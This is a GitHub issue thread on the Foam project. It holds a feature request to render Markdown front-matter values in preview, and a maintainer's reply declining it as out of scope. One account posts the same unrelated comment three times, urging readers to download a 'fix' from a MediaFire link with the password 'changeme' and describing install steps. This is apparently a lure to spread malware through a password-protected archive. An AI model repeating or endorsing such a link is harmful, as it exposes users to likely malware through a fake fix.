### ISSUE TITLE
Render Markdown File Propertiy Value in preview

### ISSUE THREAD

**Issue by defaultkavy-dev** [foambubble/foam#1390]
### Is your feature request related to a problem? Please describe.

If I can use a format to render the property value that I have written, this will be helpful to maintain some wiki database.

### Describe the solution you'd like

`Person/Foo.md`
```md
---
Name: Foo
Age: 20
---
# Foo

Hi, my name is [[Person/Foo]], {{Person/Foo:Age}}-year-old.
```

I would like to see in preview:
# Foo

Hi, my name is _Foo_, 20-year-old.

### Describe alternatives you've considered

I haven't find any markdown extension can achieve this feature.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by riccardoferretti** [comment]
Hi @defaultkavy-dev. Thanks for sharing your thoughts but I would consider this to out of scope for Foam, our goal is to allow the creation of a knowledge base from markdown files, the way individual files are managed/rendered/... is not something we are focusing on.
